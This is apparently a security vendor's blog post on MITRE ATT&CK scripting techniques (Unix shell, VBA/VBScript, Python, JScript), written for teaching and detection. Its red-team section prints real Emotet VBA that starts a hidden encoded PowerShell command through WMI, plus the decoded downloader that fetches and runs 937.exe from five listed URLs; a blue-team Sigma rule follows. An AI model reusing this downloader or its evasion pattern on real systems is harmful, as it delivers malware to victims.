MITRE ATT&CK T1064 Scripting

In 2019, Picus Labs analyzed 48,813 malware samples to determine the tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files, categorizing each observed TTP with the MITRE ATT&CK® framework. In total, 445,018 TTPs observed in the last year were mapped to ATT&CK to identify the top 10 most common techniques used by attackers. Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.

A script is a set of commands written in a scripting language such as AppleScript, PowerShell, Python, Unix shells (bash, sh and others), VBScript, and JavaScript/JScript. Legitimate users such as system administrators and programmers use scripts to accelerate operational tasks by automating them. Adversaries use scripts for the same reason: to chain multiple actions into a single step.

Introduction

A script is an ordered set of commands written in a scripting language. A scripting language is an interpreted programming language: an interpreter executes the script directly, without a separate compilation step, so no compiled binary has to be dropped on disk. Not only legitimate users but also adversaries use scripting to automate long tasks and execute code that includes multiple actions. Some scripting languages, such as PowerShell and VBScript on Windows, Unix shells on Unix-based systems, and AppleScript on macOS, can interact directly with the operating system at the API level instead of calling other programs, so adversaries can use them to bypass process monitoring mechanisms that rely on seeing new processes being launched.

In this article, we review:

  • the fundamentals of the Scripting technique
  • updates on the technique in the new version of the ATT&CK framework
  • sub-techniques derived from the Scripting technique 
  • its use cases by threat actors and malware
  • red and blue team exercises for this technique

Changes in the New Version of the MITRE ATT&CK Framework

The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques [1]. MITRE ATT&CK Sub-techniques are a way to describe a specific implementation of a technique in more detail. 

In the new sub-technique version of the MITRE ATT&CK framework, the T1064 Scripting technique is deprecated, although its page is kept so that existing mappings still resolve. Its content is split into the T1059.004 Unix Shell, T1059.005 Visual Basic, T1059.006 Python, and T1059.007 JavaScript/JScript sub-techniques of T1059 Command and Scripting Interpreter.

Command and Scripting Interpreter Sub-techniques

The first three sub-techniques of the Command and Scripting Interpreter technique, T1059.001 PowerShell, T1059.002 AppleScript, and T1059.003 Windows Command Shell, were explained in our Command-Line Interface blog post. Command-Line Interface was also among the ten most prevalent techniques in our 10 Critical ATT&CK Technique research. Although PowerShell, AppleScript, and the Windows command shell are scripting languages too, they were not part of the Scripting technique in the previous ATT&CK version, because each was already a stand-alone technique there (T1086 PowerShell, T1155 AppleScript, and T1059 Command-Line Interface).

In this blog post, we describe four other sub-techniques that are derived from the Scripting technique.

  1. T1059.004 Unix Shell

    Unix shell is the primary command-line interpreter that provides a command-line interface (CLI) for Unix-based operating systems (OS) such as macOS, Linux, and BSD. The Bourne shell (sh), Bourne-Again shell (bash), Z shell (zsh), and Korn shell (ksh) are the most commonly used Unix shells. Secure Shell (SSH) is not a shell but a remote-access protocol; it matters here because it gives an adversary one of these shells on a remote host.

    In addition to an interactive CLI, the Unix shell also provides a scripting language for controlling the OS with shell scripts. A shell script is simply a sequence of commands executed in order. Unix shells can control any part of the system and support typical programming constructs such as conditional tests, loops, file operations, variables, and functions.

    Since Unix shells are powerful and flexible tools that execute commands and control the system, adversaries use them to execute arbitrary commands and malicious payloads. They also control remote systems over SSH during the lateral movement and command-and-control phases. Some use cases of Unix shells in malware:

    • to execute multiple commands on victims:
      • macOS Bundlore adware [2], Derusbi malware [3], Linux/Exaramel backdoor [4]
    • to create a reverse shell:
      • CallMe OSX Trojan [5], Chaos backdoor [6], Cointicker macOS cryptocurrency ticker [7]
    • to start/stop OS services and installed applications:
      • LoudMiner cross-platform cryptocurrency miner [8], WindTail OSX backdoor [9]
    • to download additional payloads:
      • Shlayer macOS malware [9], [10], Skidmap cryptocurrency miner [11]
  2. T1059.005 Visual Basic
    • Visual Basic for Applications (VBA): VBA is an implementation of the Visual Basic language that provides process automation, Windows API access, and other low-level functionality through DLLs. It is included in most Microsoft Office applications, including Office for macOS. In the most common malicious scenario, adversaries embed their code in VBA macros in Microsoft Office files and send these files to victims as email attachments (MITRE ATT&CK T1566.001 Spearphishing Attachment). Because Office disables macros by default, the document's visible content is usually a lure persuading the user to click "Enable Content".
    • VBScript (Microsoft Visual Basic Scripting Edition): VBScript is a derivative of Visual Basic that lets a script control many aspects of the system through COM objects (for example WScript.Shell to run commands and Scripting.FileSystemObject to manipulate files). Although VBScript initially targeted web developers, providing client-side scripting in Internet Explorer and server-side scripting in IIS, it was adopted by Windows system administrators, and by adversaries, because of its extensive functionality; stand-alone .vbs files are executed by the Windows Script Host (wscript.exe or cscript.exe). For example, in a malware campaign revealed in March 2020, an obfuscated VBScript package was used to drop various malware such as Zloader, Ursnif, Qakbot, and Dridex [16]. The initial access vector was an email containing a zipped VBScript file (.vbs) that appeared to be an invoice.
  3. T1059.006 Python

    Python is a popular high-level interpreted programming language. Since Python interpreters are available for most operating systems and Python has a comprehensive standard library, adversaries use it to execute commands, download payloads, and perform various other malicious actions. Threat actors write not only malware but also exploit tools in Python.

    Python can be executed in multiple ways:

    • interactively from the command-line interface (CLI)
    • via Python scripts (.py)
    • via stand-alone executables that bundle the script together with an interpreter (built with tools such as PyInstaller or py2exe), so no Python installation is needed on the victim

    One of the most recent Python-based malware families is the PoetRAT remote access trojan (RAT) [17]. Briefly, a Word document containing a VBA macro drops a ZIP file; the macro then unzips it and executes PoetRAT, which is a Python script. The ZIP file also contains a Python interpreter, because Windows does not ship one by default.

  4. T1059.007 JavaScript/JScript

    JavaScript (JS) is a high-level, multi-paradigm programming language that supports event-driven, functional, and imperative programming styles. JavaScript conforms to the ECMAScript specification, the standard that keeps web pages interoperable across browsers; ECMAScript is the official name of the standardized language [18]. JScript is Microsoft's implementation of the ECMAScript specification [19]. Like most scripting languages it is interpreted; on Windows, stand-alone .js and .jse files are run by the Windows Script Host (wscript.exe or cscript.exe), which is why double-clicking a .js attachment executes it outside any browser.

    In most cases, adversaries use JScript to write droppers/downloaders that install or download the actual malware [20], [21]. They apply heavy obfuscation to the .js files to evade static AV signatures [20], [21]. In some cases, adversaries combine VBA and JScript in the same malware, as TrickBot does [22].

Red and Blue Team Exercises

Red Teaming - How to simulate?

In this exercise, we explain a real VBA code that was used by Emotet malware. We analyzed this payload in detail in our Emotet technical analysis blog posts [25].

This payload was included in the following Word document:

MD5: 515f13034bc4ccf635b026722fd5ef9c
SHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031
SHA-256: FF76FF1440947E3DD42578F534B91FDB8229C1F40FED36A3DD5688DBC51F0014


Researchers first identified Emotet in 2014 as a banking Trojan stealing sensitive and private information. Now, its operators run Emotet as delivery infrastructure offered as a service for other malware, including other banking Trojans. Emotet incorporates various obfuscation and evasion techniques to avoid detection of its payload.

Briefly, the VBA code embedded in the Word document executes an encoded PowerShell command through WMI, and that PowerShell code downloads the second-stage Emotet payload. Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems [23]. Launching PowerShell through WMI rather than directly from the macro has a detection-relevant side effect: the new process is created by the WMI provider host (WmiPrvSE.exe), not by winword.exe, so detections that only look for Office applications spawning PowerShell do not see it.

Do While GetObject("winmgmtS:win32_Process").Create("Powershell -w hidden -en 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", "", GetObject("winmgmtS:win32_ProcessStartuP"), "")

Loop

Let’s split and analyze the command:

  • Do While GetObject("winmgmtS:win32_Process").Create(): inside the Do While loop, the Create method of WMI's Win32_Process class creates a new process. Its first argument is the command line to execute, here a PowerShell command; the remaining arguments are the current directory, a Win32_ProcessStartup object, and the output process ID. Create returns 0 on success and a non-zero error code otherwise, so the loop keeps retrying until the process has actually been started. The mixed-case moniker "winmgmtS" is cosmetic: WMI monikers are case-insensitive, and the odd casing only serves to dodge naive string signatures.
  • Powershell -w hidden: -w is not a parameter name in its own right [24]; powershell.exe accepts any unambiguous prefix of a parameter name, so -w resolves to -WindowStyle. Adversaries commonly set -WindowStyle Hidden in malicious PowerShell commands so that no console window appears to the user.
  • -en: likewise, -en is completed to -EncodedCommand. -EncodedCommand accepts a Base64-encoded version of a command; note that the Base64 is computed over the UTF-16LE (Unicode) encoding of the script, so decoding it as plain ASCII/UTF-8 yields text interleaved with NUL bytes. We therefore need Base64 decoding followed by UTF-16LE decoding to reveal the PowerShell command.
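As an added example (not code from the original post, and not the Emotet sample itself), the following Python script performs the two steps just described on a command line of this shape: it resolves abbreviated powershell.exe parameters the way powershell.exe does (any unambiguous prefix of a parameter name, plus the documented short forms such as -e/-ec for -EncodedCommand), and it decodes the -EncodedCommand value as Base64 over UTF-16LE rather than over ASCII. The parameter list is the one documented in about_PowerShell_exe for Windows PowerShell 5.1 (an assumption about the version); the script it encodes and decodes is a harmless stand-in, not the Emotet payload.

```python
import base64
import binascii

# Parameter names accepted by powershell.exe, as documented in
# about_PowerShell_exe for Windows PowerShell 5.1 (assumption: that version).
POWERSHELL_PARAMS = [
    "PSConsoleFile", "Version", "NoLogo", "NoExit", "Sta", "Mta", "NoProfile",
    "NonInteractive", "InputFormat", "OutputFormat", "WindowStyle",
    "EncodedCommand", "ConfigurationName", "File", "ExecutionPolicy",
    "Command", "Help",
]
# Documented short forms that are not unique prefixes ("-e" would otherwise be
# ambiguous between EncodedCommand and ExecutionPolicy).
EXPLICIT_SHORT_FORMS = {"e": "EncodedCommand", "ec": "EncodedCommand",
                        "c": "Command", "ep": "ExecutionPolicy"}
# Switch parameters take no value; every other parameter consumes the next token.
SWITCHES = {"NoLogo", "NoExit", "Sta", "Mta", "NoProfile", "NonInteractive", "Help"}


def resolve_param(token):
    """Expand an abbreviated parameter ('-w', '-en', '-NoP') to its full name.

    Returns None when the prefix is unknown or ambiguous (e.g. '-no' could be
    NoLogo, NoExit, NoProfile or NonInteractive), rather than guessing.
    """
    name = token.lstrip("-/").lower()
    if name in EXPLICIT_SHORT_FORMS:
        return EXPLICIT_SHORT_FORMS[name]
    matches = [p for p in POWERSHELL_PARAMS if p.lower().startswith(name)]
    return matches[0] if len(matches) == 1 else None


def encode_command(script):
    """Produce the -EncodedCommand form: Base64 over the UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob):
    """Reverse -EncodedCommand. Returns None for anything that is not valid
    Base64 of UTF-16LE text (a truncated blob, stray characters, odd length)."""
    if not blob:
        return None
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def parse_powershell_cmdline(cmdline):
    """Split a powershell.exe command line into resolved parameters and, when
    -EncodedCommand is present, the decoded script.

    Tokens that cannot be resolved are reported in 'unresolved' instead of
    being silently dropped.
    """
    tokens = cmdline.split()  # simplification: flags and Base64 contain no spaces
    result = {"executable": tokens[0] if tokens else None,
              "params": {}, "decoded": None, "unresolved": []}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        full = resolve_param(tok) if tok.startswith(("-", "/")) else None
        if full is None:
            result["unresolved"].append(tok)
            i += 1
        elif full in SWITCHES:
            result["params"][full] = True
            i += 1
        else:
            result["params"][full] = tokens[i + 1] if i + 1 < len(tokens) else None
            i += 2
    if "EncodedCommand" in result["params"]:
        result["decoded"] = decode_encoded_command(result["params"]["EncodedCommand"])
    return result


if __name__ == "__main__":
    # Constructed stand-in for the Emotet command line; the real blob is not reproduced.
    blob = encode_command('Write-Host "stand-in for the downloader"')
    print(parse_powershell_cmdline(f"Powershell -w hidden -en {blob}"))
```

Decoding the blob with the wrong text encoding is the usual mistake in triage: a UTF-8 decode of the same bytes shows every script character followed by a NUL, which is the tell that the UTF-16LE step was skipped. Prefix resolution matters for detection content as well, since a signature that only looks for the literal string -EncodedCommand misses -e, -ec, -en and -enco, all of which powershell.exe accepts.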

We get the following code after Base64 decoding, removing junk variables, backtick (`) and plus (+) characters, substituting the values of variables, and beautifying the code. The details of this de-obfuscation process are in our blog post [25].

$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-includes/ha5j0b1/','https://www.qwqoo.com/homldw/3piyy4/','http://siwakuposo.com/siwaku2/X5zB0ey/')

foreach($url in $list){
    try{
        (&('new-object') Net.WebClient)."DownloadFile"($url, "$env:userprofile\937.exe");
        If ((&('Get-Item') "$env:userprofile\937.exe")."Length" -ge 29936) {
            [Diagnostics.Process]::"Start"("$env:userprofile\937.exe");
            break;
        }
    }
    catch{}
}

Briefly, this code tries to download a file from each URL in the $list array, in the given order, with the Net.WebClient.DownloadFile method and saves it to the user's profile directory ($env:userprofile) as 937.exe. If the downloaded file is at least 29,936 bytes (a sanity check that discards error pages and truncated downloads), it executes the file and stops; otherwise, and on any exception, it silently moves on to the next URL. Note the remaining obfuscation leftovers that are still valid PowerShell: cmdlet names invoked through the call operator (&('new-object')) and method and property names written as strings ("DownloadFile", "Length", "Start") both defeat simple substring signatures.

In conclusion, the VBA code given in this exercise incorporates the following MITRE ATT&CK techniques:

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1047 Windows Management Instrumentation
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1564.003 Hide Artifacts: Hidden Window
  • T1027 Obfuscated Files or Information

Blue Teaming - How to detect?

The following Sigma rule can be used to detect WMI DLLs being loaded into Word, Excel, PowerPoint and Outlook, which is what happens when a VBA macro calls GetObject("winmgmts:..."). Its image_load log source corresponds to Sysmon Event ID 7 (or equivalent module-load telemetry from an EDR), so that telemetry has to be collected for the rule to fire at all:

title: Windows Management Instrumentation DLL Loaded Via Microsoft Word
id: a457f232-7df9-491d-898f-b5aabd2cbe2f
status: experimental
description: Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands
author: Michael R. (@nahamike01)
date: 2019/12/26
tags:
    - attack.execution
    - attack.t1047
    - attack.t1059.005
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image:
            - '*\winword.exe'
            - '*\powerpnt.exe'
            - '*\excel.exe'
            - '*\outlook.exe'
        ImageLoaded:
            - '*\wmiutils.dll'
            - '*\wbemcomn.dll'
            - '*\wbemprox.dll'
            - '*\wbemdisp.dll'
            - '*\wbemsvc.dll'
    condition: selection
falsepositives:
    - Possible. Requires further testing.
level: high
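To make concrete what the rule selects, here is an added Python example (not part of the original post or of the Sigma project) that applies the rule's selection to a few constructed Sysmon Event ID 7 records. The selection is transcribed by hand rather than parsed from YAML, and Sigma's plain string-matching semantics are reproduced with fnmatch: '*' and '?' wildcards match case-insensitively, the values listed under one field are OR-ed, and the fields of a selection are AND-ed. The event records and paths are constructed for the example, not real telemetry.

```python
import fnmatch

# The rule's selection, transcribed by hand from the YAML above (this example
# does not parse Sigma YAML). Backslashes are literal path separators.
SIGMA_SELECTION = {
    "Image": [r"*\winword.exe", r"*\powerpnt.exe", r"*\excel.exe", r"*\outlook.exe"],
    "ImageLoaded": [r"*\wmiutils.dll", r"*\wbemcomn.dll", r"*\wbemprox.dll",
                    r"*\wbemdisp.dll", r"*\wbemsvc.dll"],
}


def sigma_match(pattern, value):
    """Sigma plain-string semantics: case-insensitive, '*' any run, '?' one char."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def selection_matches(event, selection):
    """A selection is an AND over its fields; a field's value list is an OR.
    A missing or non-string field never matches."""
    for field, patterns in selection.items():
        value = event.get(field)
        if not isinstance(value, str) or not any(sigma_match(p, value) for p in patterns):
            return False
    return True


def run_rule(events, selection=SIGMA_SELECTION):
    """condition: selection  ->  every event the selection matches is a hit."""
    return [e for e in events if selection_matches(e, selection)]


# Constructed Sysmon Event ID 7 (image load) records, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 7,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemprox.dll"},        # macro reaching WMI: hit
    {"EventID": 7,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ImageLoaded": r"C:\Program Files\Microsoft Office\root\Office16\mso.dll"},  # ordinary Office DLL: no hit
    {"EventID": 7,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemprox.dll"},        # not an Office process: no hit
    {"EventID": 7,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ImageLoaded": r"C:\Windows\System32\wbem\WBEMDISP.DLL"},        # case differs, still a hit
]

if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print("ALERT:", hit["Image"], "loaded", hit["ImageLoaded"])
```

Two practical caveats when deploying the rule. First, legitimate add-ins and inventory scripts also drive WMI from Office, so in environments where that is common the rule is better used as an enrichment signal than as a stand-alone alert; correlating it with a process-creation event in which WmiPrvSE.exe spawns powershell.exe within a few seconds on the same host gives a much tighter signature for the Emotet chain above. Second, the matcher here is deliberately literal about Sigma semantics: a field that is absent from the event never matches, so an image-load source that does not populate ImageLoaded will produce no hits rather than false ones.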

References

[1] “Updates - July 2020.” [Online]. Available: https://attack.mitre.org/resources/updates/updates-july-2020/. [Accessed: 10-Aug-2020]

[2] O. Sushko, “macOS Bundlore: Mac Virus Bypassing macOS Security Features,” 17-Apr-2019. [Online]. Available: https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis. [Accessed: 11-Aug-2020]

[3] Fidelis Cybersecurity, “Threat Advisory: The Turbo Campaign, Featuring Derusbi for 64-bit Linux,” Feb-2016. [Online]. Available: https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf. [Accessed: 11-Aug-2020]

[4] “New TeleBots backdoor: First evidence linking Industroyer to NotPetya,” 11-Oct-2018. [Online]. Available: https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/. [Accessed: 11-Aug-2020]

[5] R. Falcone and J. Miller-Osborn, “Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists,” 24-Jan-2016. [Online]. Available: https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/. [Accessed: 11-Aug-2020]

[6] S. Feldmann, “Chaos: a Stolen Backdoor Rising Again,” 14-Feb-2018. [Online]. Available: https://www.gosecure.net/blog/2018/02/14/chaos-a-stolen-backdoor-rising/. [Accessed: 11-Aug-2020]

[7] T. Reed, “Mac cryptocurrency ticker app installs backdoors,” 29-Oct-2018. [Online]. Available: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/. [Accessed: 11-Aug-2020]

[8] “LoudMiner: Cross‑platform mining in cracked VST software,” 20-Jun-2019. [Online]. Available: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/. [Accessed: 11-Aug-2020]

[9] “Middle East Cyber-Espionage.” [Online]. Available: https://objective-see.com/blog/blog_0x3B.html. [Accessed: 11-Aug-2020]

[10] “TAU Threat Intelligence Notification: New macOS Malware Variant of Shlayer (OSX) Discovered,” 12-Feb-2019. [Online]. Available: https://www.carbonblack.com/blog/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/. [Accessed: 11-Aug-2020]

[11] Trend Micro, “Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload,” 16-Sep-2019. [Online]. Available: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/. [Accessed: 11-Aug-2020]

[12] Microsoft Docs, “The Component Object Model.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/com/the-component-object-model. [Accessed: 11-Aug-2020]

[13] “The Windows Native API - TechNet Articles - United States (English) - TechNet Wiki.” [Online]. Available: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx. [Accessed: 11-Aug-2020]

[14] “Inter-Process Communication: Component Object Model.” [Online]. Available: https://attack.mitre.org/techniques/T1559/001/. [Accessed: 11-Aug-2020]

[15] “Native API.” [Online]. Available: https://attack.mitre.org/techniques/T1106/. [Accessed: 11-Aug-2020]

[16] blubracket, “Obfuscated VBScript Drops Zloader, Ursnif, Qakbot, Dridex - Security Boulevard,” 24-Jun-2020. [Online]. Available: https://securityboulevard.com/2020/06/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex/. [Accessed: 11-Aug-2020]

[17] W. Mercer, “PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors.” [Online]. Available: http://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html. [Accessed: 12-Aug-2020]

[18] “JavaScript Versions.” [Online]. Available: https://www.w3schools.com/js/js_versions.asp. [Accessed: 12-Aug-2020]

[19] “JScript (ECMAScript3).” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/hbxc2t98(v=vs.85). [Accessed: 12-Aug-2020]

[20] “Undetected JScript Dropper Installs Sage Ransomware,” 20-Apr-2017. [Online]. Available: https://www.vmray.com/cyber-security-blog/undetected-jscript-dropper-executes-sage-ransomware/. [Accessed: 12-Aug-2020]

[21] G DATA, “Analysis: Script.Trojan-Downloader.Fodevepdf.A” (whitepaper). [Online]. Available: https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_Analysis_Script.Trojan-Downloader.Fodevepdf.A.pdf. [Accessed: 12-Aug-2020]

[22] “Deobfuscating Ostap: TrickBot’s 34,000 Line JavaScript Downloader,” 03-Sep-2019. [Online]. Available: https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/. [Accessed: 12-Aug-2020]

[23] Microsoft Docs, “Windows Management Instrumentation.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page. [Accessed: 11-Aug-2020]

[24] Microsoft Docs, “about_PowerShell_exe - PowerShell.” [Online]. Available: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe. [Accessed: 11-Aug-2020]

[25] S. Özarslan, “Emotet Technical Analysis - Part 2 PowerShell Unveiled.” [Online]. Available: https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled. [Accessed: 12-Aug-2020]